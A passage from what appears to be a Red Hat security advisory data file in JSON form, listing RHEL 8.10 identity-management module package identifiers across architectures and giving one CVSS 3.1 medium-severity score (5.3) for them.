"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
